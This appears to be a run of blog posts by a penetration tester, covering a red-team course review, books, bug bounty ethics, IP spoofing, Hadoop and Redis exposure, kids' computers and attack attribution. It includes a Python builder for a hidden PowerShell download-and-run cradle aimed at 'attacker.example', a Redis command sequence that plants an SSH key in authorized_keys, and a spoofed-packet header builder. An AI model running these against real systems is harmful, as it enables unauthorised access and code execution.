I enjoyed the class. This was actually my second time taking the class and it wasn't nearly as overwhelming the 2nd time :-) I’ll try not to cover what is in Raphael’s article as it is still applicable and I am assuming you read it before continuing on.

I really enjoyed the VisualStudio time and building Slingshot and Throwback myself along with getting a taste for extending the implant by adding the keylogger, mimikatz, and hashdump modules.

Developers with Windows API experience may be able to greatly extend Slingshot, but I don't think I have enough WinAPI kung fu to do it, and there wasn't enough setup around the "how" to do it consistently unless you already have a strong Windows API background. However, one of the labs consisted of adding load-and-run PowerShell functionality, which allows you to make use of the plethora of PowerShell code out there.

There was also a great lab where we learned how to pivot through a compromised SOHO router and the technique could also be extended for VPS or cloud providers.

Cons of the class.

The Visual Studio piece can get overwhelming, but it definitely gives you a big taste of (Windows) implant development. The class materials are getting slightly dated in some cases; a refresh might be helpful. More Throwback usage and development would be fun (even as optional labs).

Lab 1 was getting a fresh copy of Slingshot back up and running, then setting up some additional code to do a PowerShell web cradle to get our Slingshot implant running on a remote host, similar to how Metasploit's web delivery does things.
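For flavor, the cradle we built resembled the standard Net.WebClient download cradle. Here's a small Python helper that assembles one; the URL and flags are illustrative, not the exact ones from the lab:

```python
def build_cradle(url: str) -> str:
    """Return a PowerShell download cradle that fetches and runs a script in memory."""
    # -NoP: no profile, -W Hidden: hidden window, -C: run the command string
    return (
        'powershell.exe -NoP -W Hidden -C '
        f'"IEX (New-Object Net.WebClient).DownloadString(\'{url}\')"'
    )

# Hypothetical staging URL, just to show the shape of the one-liner:
print(build_cradle("http://attacker.example/slingshot.ps1"))
```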

Lab 2 was doing some DevOps to set up servers, OpenVPN to tunnel traffic, and adding HTTPS to our Slingshot codebase.

Lab 4 was tweaking our HTA to defeat some common detections and protections. We also worked on code to do sandbox evasions as it’s becoming more common for automated sandbox solutions to be tied to mail gateways or just for people doing response.

Lab 5 covered whitelist bypassing.

Lab 6 was doing some profiling via PowerShell and using Slingshot to run checks on the host.

I enjoyed the four days and felt like I learned a lot. So the TLDR is that I recommend taking the class(es).

Criticisms: I think the set of courses is having a bit of an identity crisis, mostly due to the 2-day format, and would be a much better class as a 5-day. It is heavily development focused, meaning you spend a lot of time in Visual Studio tweaking C code. The "operations" piece of the course definitely suffers a bit due to all the dev time. There was minimal talk around lateral movement, and the whole thing is entirely Windows focused, so no Linux and no OSX. A suggestion to fix the "ops" piece would be to have a Dark Side Ops - Dev and a Dark Side Ops - Operator course, where the dev one is solely deving your implant and the Operator course is solely using the implant you dev'd (or were provided). The Silent Break team definitely knows their stuff, and a longer class format or switch-up would allow them to showcase that more efficiently.

A good friend/co-worker recently turned 30. In preparation for his birthday party I gave some thought to my 30th birthday and the things I now know or have an idea about and what I wish I had known at that point in my life.

I decided to buy him a few books that had impacted my life since my 30th birthday and that I wish I had known about or read earlier in life.

I'll split the post into two parts: computer books and life/metaphysical books.

Computer books

This is by no means an exhaustive list. A more exhaustive list can be found here (recently updated).

He already had The Web Application Hacker's Handbook but had he not I would have purchased a copy for him. There are lots of Web Hacking books but WAHH is probably the best and most comprehensive one.

The Phoenix Project is absolutely one of the best tech books I've read in the last few years. Working for Silicon Valley companies I think it can be easy to take for granted the whole idea of DevOps and the power it brings when you can do infrastructure as code, micro services, and the flexibility DevOps can bring to prototyping and developing code and projects. There is also the "security guy" in the story that serves as the guy we never want to be but sometimes end up being unbeknownst to us.

The running joke is that Zero to One is in the Hipster starter kit but I thought it was a great book. The quick summary is that Peter Thiel describes businesses that iterate on a known problem and can be successful and there are businesses that create solutions to problems we didn't know we had. Examples of the latter being companies like Google, Facebook, PayPal, Uber. It's a short book and should be required reading for anyone thinking of starting a business.

The following is life stuff, so if all you care about is tech shit, feel free to eject at this point.

still here?

Metaphysics

1st, Many Lives Many Masters by Brian Weiss. A nice, gentle introduction to the idea that we reincarnate and that our souls are eternal. Written by a psychiatrist who more or less stumbled into the fact that people have past lives while doing normal psychiatry work.

From Amazon: "As a traditional psychotherapist, Dr. Brian Weiss was astonished and skeptical when one of his patients began recalling past-life traumas that seemed to hold the key to her recurring nightmares and anxiety attacks. His skepticism was eroded, however, when she began to channel messages from the “space between lives,” which contained remarkable revelations about Dr. Weiss’ family and his dead son. Using past-life therapy, he was able to cure the patient and embark on a new, more meaningful phase of his own career."

2nd, A New Earth by Eckhart Tolle. This is the best book I read in 2016 and I've been sharing it with everyone I can. Everyone in infosec should read this book to understand the way the ego works in our day-to-day lives.

From Amazon: "In A New Earth, Tolle expands on these powerful ideas to show how transcending our ego-based state of consciousness is not only essential to personal happiness, but also the key to ending conflict and suffering throughout the world. Tolle describes how our attachment to the ego creates the dysfunction that leads to anger, jealousy, and unhappiness, and shows readers how to awaken to a new state of consciousness and follow the path to a truly fulfilling existence."

3rd, Self Observation by Red Hawk. The practical application guide if you got something from A New Earth. An instruction manual around self-observation.

From Amazon:"This book is an in-depth examination of the much needed process of 'self'-study known as self observation. We live in an age where the "attention function" in the brain has been badly damaged by TV and computers - up to 90 percent of the public under age 35 suffers from attention-deficit disorder! This book offers the most direct, non-pharmaceutical means of healing attention dysfunction. The methods presented here are capable of restoring attention to a fully functional and powerful tool for success in life and relationships. This is also an age when humanity has lost its connection with conscience. When humanity has poisoned the Earth's atmosphere, water, air and soil, when cancer is in epidemic proportions and is mainly an environmental illness, the author asks: What is the root cause? And he boldly answers: failure to develop conscience! Self-observation, he asserts, is the most ancient, scientific, and proven means to develop this crucial inner guide to awakening and a moral life. This book is for the lay-reader, both the beginner and the advanced student of self observation. No other book on the market examines this practice in such detail. There are hundreds of books on self-help and meditation, but almost none on self-study via self observation, and none with the depth of analysis, wealth of explication, and richness of experience which this book offers."

In my mind, the key to success in blogging is to be totally selfish in its planning and execution. Blogging is a personal activity/journey that you allow the public to be a part of. What I mean by this is that the main audience for your blog should be YOU. My blog is a place where I take notes and occasionally try to talk about more touchy-feely topics or issues. These notes are notes that I'm OK with sharing publicly. I also keep a private blog (but really more notes/cheat-sheet, think RTFM... I use MDwiki) because you don't need to give everyone all your tricks and secrets. If you show up for a new job and everyone knows your tricks because you've shared them publicly (because you need attention from strangers), what value are you bringing to your employer?

The benefit of blogging is note taking. I'm a HUGE proponent of taking notes and I'd chalk a lot of my success up to taking copious notes. When I figure out how to mess with technology X, I take notes on it. As a consultant, it may be months or years before I see it again. Having notes to go back to saves time and stress. It also allows me to help people on my team in the event they run into it while I am on a different project.

How/Platforms: I use Blogger because I don't want to secure/worry about my blogging platform. This blog was on Drupal for a bit and some jerk decided to publicly make an example of the blog's lack of updates at BlackHat (appreciate the heads up... #totallynotbitter). With Blogger, hosted WordPress, or some other hosted platform, I'm offloading the risk and I don't have to worry about keeping up with patches.

Consistently posting: no idea. It's clear I have lost the ability to post consistently. I do sometimes queue up a bunch of posts and schedule their posting. I've found it was easier to find things to blog about when I was consulting, since I had a different client every week and it would be difficult to tie a vulnerability back to any particular client.
Now that I work for a company, if I'm talking about some vulnerability or exploit I used, there is a good chance I used it for work, potentially exposing the company to risk.

Length. No one reads long posts. Break long posts into separate logical posts even if you choose to post them at the same time.

I've been giving quite a bit of thought to what component of the process brings me the most excitement and enjoyment. I believe I have identified what component brings me the most enjoyment and will focus on that piece and work to manage any expectations I place on others.

I very much appreciate everyone that engaged in the conversation with me.

Most of my life I've been frustrated/intrigued that my Dad was constantly upset that he would "do the right thing" by people and in return people wouldn't show him gratitude... up to straight up fucking him over in return. Over and over the same cycle would repeat of him doing right by someone only to have that person not reciprocate.

The above is important as it relates to the rest of the post and topic(s).

I was relaying some frustrations to a close non-infosec friend about my experience of discovering companies had made some fairly serious Internet security uh ohs... like misconfigured s3 buckets full of db backups and creds, root AWS keys checked into github, or slack tokens checked into github/pastebin that would give companies a "REALLY bad day". These companies had been receptive to the reporting and fixed the problem but did NOT have bug bounty programs and thus did not pay a bounty for the reporting of the issue.

My friend, with some great insight and observation, suggested that I was getting frustrated and doing exactly the same thing my Dad was doing by having assumptions on how other people should behave.

So this blog post is an attempt for me to work thru some of these issues and have a discussion about the topics.

Questions I don't necessarily have answers for:

1. Does a vulnerability I wasn't asked to find have value?

2. If someone outside your company reports an issue and you fix it, does that issue/report now have value/deserve to be paid for (bug bounty)?

3a. If #1 or #2 is Yes, when a business doesn't have a Bug Bounty program, are they morally/ethically/peer pressure obligated to pay something? If they have a BB program I think most people agree yes. But what about when they don't?

3b. Does the size of the business make a difference? If so, what level? mom and pop maybe not, VC funded startup? 30 billion dollar Hedge Fund?

4. Is a "Thanks Bro!" enough, or have we evolved as a society where basically everything deserves some sort of monetary reward? After being an observer for two BB programs... "f**k you pay me" seems to be the current attitude. If they did a public "Thanks Bro," does that make a difference/satisfy my ego?

5a. Is "making the Internet safer" enough of a reward?

5b. Does a company with an open S3 bucket make the Internet less safe? Does a company leaking client data make the Internet less safe? [I think Yes] Does a company leaking their OWN data make the Internet less safe? [It's good for their competitors]

If they get ransomware'd or their EC2 infra shut down/turned off/deleted Code Spaces style, am I somewhat (morally) responsible if I didn't report it?

6. Does ignoring a pretty significant issue for a company make me a "bad person"?

7a. Am I a "bad person" if I want $$$ for reporting the issue?

7b. If yes, is that because I make $X and I'm being a greedy bastard? What if I made way less money?

7c. Does ignoring/not reporting an issue because I probably won't get $$ make me a "bad person"? Numbers 1-3 come into play here for sure.

My last two jobs, I've worked for companies that had Bug Bounty programs, so my opinion on the above is DEFINITELY shaped by working for companies that get it: they understand and care about their security posture, and they do feel that security issues reported by outside researchers have monetary value. An added benefit of having a program, especially through one of the BB vendors, is that you get to NDA the researchers and you get to control disclosure.

Thoughts/comments VERY welcome on this one. Leaving comments seems out of style now but I do have open DM on twitter if you want to go that route. I have a few real world experiences with this where I let some companies know some pretty serious stuff (slack token with access to corp slack, S3 buckets with creds/db backups, and root aws keys checked into github for weeks) where it was fixed with no drama but no bounty paid.

I've largely not paid attention to these types of attacks in the past but in this case needed to validate I could get the vulnerable host to send traffic to a target/spoofed IP.

I set up two boxes to run the attack: an attack box and a target box that I used as the spoofed source IP address. I ran tcpdump on the target/spoofed server (yes... listening for UDP packets) and it received no UDP packets when I ran the attack. If I didn't spoof the source IP, the vulnerable server would send data back to the attacker IP, but not the spoofed IP.
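For reference, here's roughly what I was trying to put on the wire, sketched in Python: an IPv4/UDP header with a forged source address. The addresses are documentation-range placeholders; actually sending this needs a raw socket (root) plus an upstream network that doesn't filter spoofed sources, which, as it turns out, most do:

```python
import socket
import struct

def ip_checksum(header: bytes) -> int:
    """Standard one's-complement IPv4 header checksum."""
    if len(header) % 2:
        header += b"\x00"
    total = 0
    for i in range(0, len(header), 2):
        total += (header[i] << 8) | header[i + 1]
    while total >> 16:                      # fold carries back in
        total = (total & 0xFFFF) + (total >> 16)
    return ~total & 0xFFFF

def build_spoofed_ipv4_header(src_ip: str, dst_ip: str, payload_len: int) -> bytes:
    """20-byte IPv4 header, protocol 17 (UDP), with a spoofed source IP."""
    total_len = 20 + 8 + payload_len        # IP header + UDP header + payload
    fields = struct.pack(
        "!BBHHHBBH4s4s",
        0x45, 0, total_len,                 # version/IHL, TOS, total length
        0x1234, 0,                          # ID, flags/fragment offset
        64, 17, 0,                          # TTL, protocol, checksum placeholder
        socket.inet_aton(src_ip), socket.inet_aton(dst_ip),
    )
    csum = ip_checksum(fields)
    return fields[:10] + struct.pack("!H", csum) + fields[12:]

hdr = build_spoofed_ipv4_header("203.0.113.7", "198.51.100.9", 48)
# a receiver re-running the checksum over a valid header should get 0
assert ip_checksum(hdr) == 0
```

Sending it would then be `socket.socket(AF_INET, SOCK_RAW, IPPROTO_RAW)` plus `sendto()`, but whether the packet ever arrives is entirely up to your provider's egress filtering.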

So I asked on Twitter... fucking mistake... after getting past the trolls and well-intentioned people who didn't think I understood basic networking/spoofing at all (heart u), I was pointed to link #1 and link #2 as the likely reason I couldn't spoof the IP, as well as a hint that the last time someone got it to work they had to rent a physical server in a dodgy colo.

A bit of reading later I found https://spoofer.caida.org/recent_tests.php, which lets you check whether a particular ASN supports spoofing, along with the stat that only about 20% of the Internet allows spoofing.

Checking common ISP and cloud provider ASNs showed that most don't allow spoofing.

So mystery solved and another aux module/vuln scanner result that can be quickly triaged and/or ignored.

If someone has had different results please let me know.

P.S. Someone asked if the vulnerable host was receiving the traffic. I couldn't answer for the initial host, but to satisfy my curiosity on the issue I built a vulnerable NTP server and it did NOT receive the traffic, even with hosts from the same VPS provider in the same data center (different subnets).

I put heroes in asterisks because none of us have paparazzi following us around. I regularly use Val Smith's quote that being even the most popular infosec person is like being a famous bowler. Except for rare exceptions, no one outside of our community knows who we are. I've broken into at least one company from every vertical and my neighbor just asks me to help configure his wifi.

This topic came up because the person I'm mentoring met "a famous infosec person" and the guy proceeded to be a drunk dbag to him. It took quite a bit of wind out of his sails to have someone he kinda looked up to bag on his current career state and the talks he was working on.

When I first joined the Army, I thought anyone with a "tower of power" (Expert Infantry Badge, Airborne, Air Assault) was an awesome, do-no-wrong individual. Shit, if someone has all that on their chest, they must be badass, right??!! For more info on badges: https://en.wikipedia.org/wiki/Badges_of_the_United_States_Army

Well the Army does a great job of stacking the people you initially meet as being pretty decent individuals. I think most people think highly of their drill sergeants their entire life. So the first few people I met that had these badges reaffirmed this belief. Then I got out and met a few more and was completely let down at the quality of these people. When I say let down, I mean defeated/totally bothered that these people didn't live up to the pedestal I had put them on. It REALLY bothered me.

What you learn is that in the military, a badge you earned at any point in your career can be worn for the rest of your career. So maybe at some point someone was awesome enough to earn a badge. That doesn't mean they are a great leader, are still good at what the badge says they are good at, or are even a good person. It means that at one point in time they met a criteria and earned a badge.

How does this relate to Infosec?

We are all humans and generally react poorly to any sort of fame.

A good chunk of us are introverts.

The "community" values exploits and clever hacks over being a good person or helping others.

We have people that, 10 years later, are still riding the vapor trails of some awesome shit they did but haven't done anything else relevant since. Some people have giant egos and only care about you if you are currently in the process of kissing their ass. To be fair, if people ARE kissing your ass it's hard not to get an ego, but you have to work hard to check that shit at the door.

"The Apache Hadoop software library is a framework that allows for the distributed processing of large data sets across clusters of computers using simple programming models. It is designed to scale up from single servers to thousands of machines, each offering local computation and storage. Rather than rely on hardware to deliver high-availability, the library itself is designed to detect and handle failures at the application layer, so delivering a highly-available service on top of a cluster of computers, each of which may be prone to failures." (from: http://hadoop.apache.org/)

Although occasionally you'll find one that will just let you pick your own :-) If you gain access: full HDFS access, run queries, etc.

HDFS WebUI

HDFS exposes a web server which is capable of performing basic status monitoring and file browsing operations. By default this is exposed on port 50070 on the NameNode. Accessing http://namenode:50070/ with a web browser will return a page containing overview information about the health, capacity, and usage of the cluster (similar to the information returned by bin/hadoop dfsadmin -report).

From this interface, you can browse HDFS itself with a basic file-browser interface. Each DataNode exposes its file browser interface on port 50075.
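If the cluster has WebHDFS enabled (common, but config-dependent via dfs.webhdfs.enabled), that same NameNode web port also serves a REST API you can script against instead of clicking through the file browser. A minimal sketch; the hostname is a placeholder:

```python
def webhdfs_url(namenode: str, path: str, op: str = "LISTSTATUS", port: int = 50070) -> str:
    """Build a WebHDFS REST URL for the NameNode's web port."""
    return f"http://{namenode}:{port}/webhdfs/v1{path}?op={op}"

# e.g. fetching a directory listing (commented out; needs a live cluster):
# import json, urllib.request
# listing = json.load(urllib.request.urlopen(webhdfs_url("namenode", "/")))

print(webhdfs_url("namenode", "/tmp", op="OPEN"))
```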

I wanted to be able to boot Kano OS in a virtual machine so I could play Hack Minecraft with the kids and play along with the Kano OS desktop/games. I was trying to avoid plugging a Raspberry Pi into a monitor and wanted to use it on my local laptop.

By following the steps on that page with regard to mounting the image and editing /etc/ld.so.preload and /etc/fstab, I was able to get the image to boot up successfully... slow as hell... but it technically was working.

It was so horribly slow I don't think this is feasible. I am going to try using libvirt to make it better, or just see if I can play Hack Minecraft another way. If I get anywhere further with the project, I'll post an update.

Favorite talks

Bridging the gap between ICS (IoT?) and corporate IT security, by Stefan Lüders

I really enjoyed this talk, hearing how an organization defends in a BYOD and academic environment. Defense is difficult when you control the hosts, even more so when you can't instrument the host and have to rely on network controls only.

WTF is it? The Kano computer is a Raspberry Pi-based computer that is meant for kids to put together and build themselves. Looks a bit like this (propaganda video):

It ships with a nice guide that most kids will be able to follow to get the pieces of the Kano computer up and running. Optionally, you can also buy a screen kit where everything fits together in a tidy package. The screen kit that houses the Raspberry Pi and keyboard is the reason I went with the Kano over just piecing one together for the kids.

Once you get the hardware set up, Kano OS walks you through setting up a user account and starts off in story mode, where you begin on SD beach and get to explore your computer in an RPG-type environment.

You also have a menu for kids where they can pick what they want to work on, but there's also a Classic button if you want a more normal Linux experience.

Not shown in the screenshot, but definitely present in the menu now, is a link to Scratch, which the kids love. And of course, no computer for kids can ship without Minecraft:

This week's "Secrets of the Computer Kit" included an introduction to the Linux terminal and cowsay!

cowsay, with some Scratch on the other Kano

The kids also got their first real Linux experience when the screen flipped and stayed flipped after a reboot. We eventually found an option in the menu to flip it back, but it was a nice introduction to the hell that is running Linux... good times. Enjoy Linux hell, boys; I'll be here to help you.

Overall, extremely pleased. Two negative experiences, though. One was the first upgrade process: it took over 30 minutes to download all the updates, and I ended up losing the kids for the nite due to it taking so long. Second was the fact that the computers showed up one day and the monitors the next!? WTF. I realize Kano doesn't have control of all things shipping, but it was a real PITA to have computers and no monitors. Suggestion: bundle kits should ship together. Aside from the above, the kids have been enjoying their new computers.

“However, the ability to control the server configuration using the CONFIG command makes the client able to change the working directory of the program and the name of the dump file. This allows clients to write RDB Redis files at random paths, that is a security issue that may easily lead to the ability to run untrusted code as the same user as Redis is running”

He goes on to show how someone could echo SSH keys over and use the CONFIG command to write them to the appropriate place if you have permissions. He used a key name of "crackit," so I thought I'd see how prevalent it was... I checked a few boxes and saw it in a good chunk of them.
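Antirez's technique boils down to a short command sequence. Here's a Python sketch that just assembles the commands for illustration; the key is a placeholder and nothing is executed against a server:

```python
def crackit_commands(pubkey: str, ssh_dir: str = "/root/.ssh") -> list:
    """Assemble the Redis commands that write an SSH public key into authorized_keys."""
    # leading/trailing newlines keep the key on its own line amid the RDB binary junk
    payload = "\n\n" + pubkey + "\n\n"
    return [
        "FLUSHALL",                              # empty the DB so the dump is mostly our key
        f'SET crackit "{payload}"',              # the telltale key name from the post
        f"CONFIG SET dir {ssh_dir}",             # point the dump at the target's .ssh dir
        "CONFIG SET dbfilename authorized_keys", # name the RDB file authorized_keys
        "SAVE",                                  # write it out
    ]

for cmd in crackit_commands("ssh-rsa AAAA EXAMPLEKEY user@example"):
    print(cmd)
```

This only works when Redis is exposed unauthenticated and running as a user with write access to the target directory, which is exactly what the open boxes on Shodan provide.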

go go shodan

I did find something interesting while looking thru some open redis boxes. I found:

A cron job? running a shell script. Can you do that from Redis???

What's in the shell script?!

alt coin mining! sweeeeeet.

I had no idea what XMR was, but I wanted to see how this person was doing with the money making. Thankfully, you can just query the payouts for any XMR address. So I did:

They've made around $20,000 USD in BTC. I guess crime does pay :-)

To satisfy my curiosity, I started a miner up on a Linode and was getting around 60 H/s. This person is cranking out 70 KH/s, so they have a few boxes working for them.
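A quick back-of-the-envelope on those two numbers:

```python
linode_rate = 60        # H/s I measured on a single Linode
observed_rate = 70_000  # 70 KH/s reported for the miner's address
equivalent_boxes = observed_rate / linode_rate
print(round(equivalent_boxes))  # roughly how many Linode-sized boxes that is
```

So "a few boxes" is really on the order of a thousand Linode-sized machines (or a smaller number of much beefier compromised hosts).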

Back in the day, you could download a piece of software, reverse engineer / fuzz it, find bugs, notify the vendor, post on Full Disclosure, watch a patch come out, and move on to the next bug.

These days systems have become very complex. A system might include:

A HID (Touch screen, keyboard, other devices)

Data Inputs (USB key, Bluetooth, Wireless, Satellite, Cell)

Firmware (BIOS or other embedded aspects)

OS

Applications (both OEM and 3rd party)

Media Servers

Other control systems

Telematics interfaces

This collection of components may be very expensive, on the order of $250k in some cases, or say $10-20k for a car. These components may be made by multiple different vendors, all with NDAs and MSAs between them.

This whole system is then certified and tested by numerous bodies such as FAA, TSA, NHTSA, NAFTA OEMs, Avionics Manufacturers such as Boeing and Airbus, Airlines, etc. There may be regulations and requirements around patch cycle timing, disclosure, and legal.

How in this context, can these systems be tested for security issues in a reliable and effective manner? Right now there are several ways this testing occurs:

1.) Via Testing Contracts.

The vendor puts out a bid or otherwise engages a 3rd party security company to test the system. NDAs and MSAs are exchanged, access to the system is provided, testing performed, and results delivered. Fixes are developed and pushed out according to the schedule and requirements agreed upon by all the organizations outlined above.

PROS

Vendor has a level of protection that their reputation won't be tarnished via media disclosures, their IP stolen, etc. Vendor has some assurance the testers are competent and there is a level of service expected.

CONS

This process is not public, and people outside this framework have little to no insight into what is going on, how testing is done (or if it is), who is doing it, what fixes have been put in place, etc. This also limits the number of bright people who can see and test the system, almost ensuring that some bugs will be missed.

2.) Bug Bounties.

Vendors make some aspect of the system available publicly for anyone to test and pays a bounty for valid vulnerabilities discovered. In some special cases the vendor may make an entire system accessible for a limited amount of time. (Time limited to offset the cost of the system)

PROS

Process is public and many eyes are on the product. Raises the exposure of the product to new testers and approaches. Builds a level of trust in the vendor and assurance that the vendor "cares about security".

CONS

Costs the vendor time and effort and often produces little more than noise, or bugs already known about through internal testing. (I'm basing this on my personal discussions with vendors in the real world). Testing quality is often very low. Often the holistic system cannot be tested in this way, only components.

3.) Rogue Testing.

This is sort of where I came up in the industry initially, before moving more into 1.) above. The way this works is that a researcher (or team of researchers) and/or a security company gains access to a system in some way. Examples include buying a piece of the system on eBay or, in the case of publicly available systems such as avionics, testing it live. A car could be bought as well. This is sort of a black box approach, as access to all the back-end systems, telematics, source, etc. will not be available.

PROS

A researcher can sort of do whatever they want without constraints. A security company can leverage this for media attention (marketing/sales), and it drums up interest for conference talks. Real bugs are found this way and the vendor is technically notified, either as a heads-up by the finder or via the media.

CONS

No trust is developed between the vendor and the bug finder. In fact, the relationship is almost always adversarial by its nature. The public receives an unclear picture of the true threat. Do they trust the finder, who is often over-hyping to get attention, or do they trust the vendor, who has a material interest in under-hyping and disproving the bug?

I'm sure I am missing other pros and cons to each of these, so please feel free to send me ideas. I'm also sure there are other approaches to testing which is why I am making this post. Here are some questions to consider:

Are complex systems such as avionics and automotive substantially the same from a testing perspective as windows hosts or endpoint software?

Is live testing on a passenger vehicle really the right way to do security testing?

Should only professional security companies with contracts in hand be allowed to test?

Are bug bounties in their current incarnation really effective for these types of systems?

My answer to the above questions is probably no.

I propose that we, the security community, collectively try to come up with a better way or framework for doing this. Any ideas will be appreciated and considered. Are you already doing something in this arena that is better than what I have outlined? Is there something you thought would work but have not gotten traction on?

I'd love to hear from vendors, sec companies, and researchers alike.

I also propose that unethical behavior in our industry be called out. Every time a company brushes up against extortion, over-hypes a bug, or claims credit for a non-employee's work, just for short-term sales, it damages the credibility of all of us and makes our jobs harder. Let's require the best of ourselves. Security has become huge, and is about to become bigger. Over the last year, think how many times hacking has been in mainstream media. Now contrast that with 10 years ago. This is an industry that is about to explode. Do we really want to be found wanting when the world finally is ready to take us seriously?

Thomas Ptacek made an interesting tweet today about Nation States and whether the term has any meaning, which got me thinking. In light of the numerous breaches that have been occurring, affecting commerce, government, and potentially even elections, I decided to take some time to write down my thoughts on some of the subjects that come up when these events occur.

First, let's talk about victim psychology. When a person or an organization is hacked, they go through emotions similar to those of victims of any crime. There is shame and guilt, anger, a desire to "do something about it" and to make sure "this can never happen again."

There is also a felt need to justify why the breach occurred: "How could this have happened?" Also important to take into consideration is the mindset of investigators. They like catching the bad guy, uncovering the mystery, beating the attacker at their own game. However, it's not exciting to investigate or report on a dumb or simple attacker who did nothing exceptional. Because of this, people are highly incentivized to look for indicators or confirmation that the attacker was somehow exceptional. It makes it more OK that they lost and were compromised, and it makes investigators' jobs more exciting. (I know, I've been there.)

Let's talk about a word that gets thrown around a lot by media, government, and intrusion investigators: sophisticated. This term seems to imply a sort of evil genius, someone who did such outlandishly amazing feats of hacking that there is no way your average organization could have stopped or detected them.

"We got broken into!"
"How could this have happened? Didn't you do your job? Didn't we spend all that money on defenses?"
"Well, they were VERY sophisticated."
"Oh, well, OK then, nothing we could have done."

This is both true and not true. Defenders really have little hope of keeping attackers out (sophisticated or not), even if they do most everything right. Worse, what it takes to do everything "right" is very expensive, the talent to do so is scarce and hard to find, and the technology involved changes rapidly. In actuality, most breaches aren't really that sophisticated, depending on how you define the term.

In the interest of giving you background, let me say I've personally investigated a large number of breaches, and my team even more. I've conducted an even larger number of attacks myself for security purposes, even some I would label as sophisticated, so I've worked on both sides of the issue. We have seen breaches verified to be government attacks (verified by direct human means among a number of other things, giving me high confidence, not just by an IP address or a foreign word in code), organized crime, talented blackhats, vandalizing kids, corporate competitors, and malicious insiders. In all of these investigations, very few did anything that I would personally classify as sophisticated.

It's probably time to define what I mean when I say sophisticated. To me an attack requires a number of elements in order to be considered sophisticated:

Is targeted rather than opportunistic. This means someone set out with intent to attack the organization, rather than stumbling across a random vulnerability they could take advantage of while looking for anything to break into.

Is planned. This means someone didn't just say "Let me throw a bunch of attacks at this organization I don't like", but rather put together a plan for getting in, staying in, targeting data or capabilities, getting information out, and hiding their identity. There are clues during an investigation that help you see the difference between a planned attack and a haphazard one.

Uses unique technology or technology in a unique way. Unless there is an intentional deception going on, sophisticated attacks don't use off the shelf hacker / auditor tools. They typically use high quality (reliable) custom tools, or tools available as a part of operating systems in unusual or unintended ways.

Involves malware that obviously took a team to write. There are very talented individuals who can write custom tools, but most often sophisticated tools are written by teams of specialists who break up and take on different features or capabilities of the tool. If you are looking at code, you can often tell this.

May involve anti-analysis or anti-investigation techniques, or target investigators directly.

Long term persistence. Random hackers usually want to get in and get out. Sophisticated hackers have more confidence in their tools and abilities, have more resources, and tend to stay a while to extract all the value from the compromise they can.

You may not agree with all of my criteria, but hopefully we can agree on the fact that there must be SOME criteria for classifying an attack as sophisticated. I should note that I have seen sophisticated attacks violate any number of the above requirements. Individually none of them certify that an attack is sophisticated, but if taken all together or in majority, they typically do.

Now let's tackle this term "Nation State". As it turns out, this is much trickier than you might suppose. In the context of computer attacks, most people might define this as an attack carried out purposefully by a government against an organization, individual, or other government. People like very clean, clear-cut, black and white definitions so that we know who the bad guy is and who the good guy is. Unfortunately the world doesn't work so simply. I would like to propose that a Nation State attack could be one which incorporates any of the following:

A highly talented individual hacker, hacking mostly alone. This person may be monitored by a government, either passively or actively, which benefits from their non-directed actions.

A private, non-government employed, hacker group, whose activities get co-opted by a government.

Defense contractors and other private businesses who supply tools and talent, knowingly or unknowingly, to a government and its interests.

Military staff whose purpose is typically more one of disruptive capability, but may collaborate with any of these other groups.

Civilian government staff, comprised of intelligence professionals and others, who leverage cyber attacks for intelligence purposes.

Any of the above who are acting for other purposes, such as personal financial benefit, not under the direction of a government, but perhaps using government tools and resources.

In light of the above, an attack may use known Nation State tools, but could be carried out by someone who either captured or stole these tools, or is using them on the side, without permission, for personal gain. Imagine, for example, a country where you don't have to be a government or military employee to hack for the government. You are given access to the best tools and training, covert networks, and target lists. You see a lot; you know where money and secrets lie. Then government policies change and your services are no longer needed, or are less needed. Maybe you took copies of the tools home. Maybe you still have accounts or access to jump stations and command and control servers. It might be tempting to leverage this to make a little money on the side. Many investigators will see the IPs you are coming from, the tools you are using, and your language preferences, and make the Nation State determination, even though this is clearly not the case. I would venture to say that unless you have the following, attribution is shaky at best:

Initial entry vector

Copies of the tools used and high end reverse engineering capabilities

Full packet capture and netflow of the attack

Comprehensive logs

Forensic images of compromised hosts

Threat Intelligence sharing across multiple organizations or even countries

Human intelligence (e.g. confessions from the attacker, group infiltrators and spies, human assets in law enforcement or other investigatory organizations)

Hack back. Access to attacker systems and infrastructure, or even national network infrastructure in order to monitor the actual sources of attacks.

Now for most private companies, the above is prohibitively expensive to maintain, the talent too scarce, and national laws too unfriendly; from a business standpoint it doesn't make sense to bother. There are of course exceptions, and multiple companies working in an industry and cooperating with government or law enforcement might get close.

It is also important to say that Sophisticated attacks aren't necessarily Nation States, and Nation State attacks aren't necessarily Sophisticated. Let me give some examples.

I know the story of an individual who, when they were around 14 years old, researched and developed a suite of what I would call sophisticated tools, including hardware firmware persistence, air-gap jumping, and exfiltrated-data analytics. This person then extensively planned out an attack against a government in a country other than their own, and conducted it over the course of around a year. They did this primarily for the intellectual pursuit, and to gain access to specific technologies to help them in further attacks down the road. This attack was eventually discovered and classified as a Sophisticated Nation State attack by the investigators, when in fact it was a talented kid, acting alone.

I have personally investigated attacks verified to be directed, executed, and managed by a foreign government, which used straight up off the shelf and publicly available hacker tools, in very obvious and even clumsy ways. The attack was successful, but was caught and stopped pretty quickly and was only determined to be Nation State because an outside organization had proof obtained by other investigatory means.

I have also seen (and performed) attacks where a couple of US based blackhats will create or purchase a 0day, modify it, build a suite of custom tools developed with foreign language packs, anonymously purchase or compromise hosts in a foreign country, and conduct a campaign against an organization in the US which has all the hallmarks of being a Sophisticated Nation State attack. But it was actually just us performing an attack simulation for a client, or a group of non-government affiliated blackhats using deception to hide who they are.

A sophisticated attack can be an expensive one (although in the case of the 14 year old, maybe not so much). High-end attack tools, 0day, etc. are very valuable and take time to produce. You don't want to burn these tools for no reason. This means there is incentive to use the least sophisticated and cheapest means that will still accomplish your goals.

In many cases, the detection aspects in the list above don't matter, even for nation states. Sometimes if you can get in and get what you need with little to no repercussions, you don't care if you are detected a month later.

If you think about it this way, then the ideal situation might be to watch while a non-affiliated 3rd party performs the attack, using their own tools, and you simply reap the access or data rewards without getting your hands dirty.

The goal of this post was to point out that when you hear the terms Nation State or Sophisticated attack thrown around by the media, or by companies who sell investigation / threat intelligence services and tools, you might hesitate before taking them at face value. I'm not saying these organizations are being intentionally or maliciously misleading, just that their criteria for making those statements may be too loose and ill defined.

This can be tedious if you want to spin down an instance with tons of Metasploit workspaces on it. So I wrote a quick resource script to get it done. It takes a list of workspaces. I'm sure you can programmatically retrieve the workspaces, but I didn't. Code below:
